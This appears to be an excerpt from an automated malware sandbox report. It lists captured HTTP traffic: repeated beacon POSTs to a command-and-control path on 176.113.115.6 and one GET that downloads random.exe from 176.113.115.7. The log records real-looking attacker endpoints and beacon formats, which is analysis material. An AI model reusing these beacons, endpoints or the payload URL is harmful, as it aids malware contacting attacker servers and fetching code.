Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET /files/qqdoup/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 38 36 39 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10198690101&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
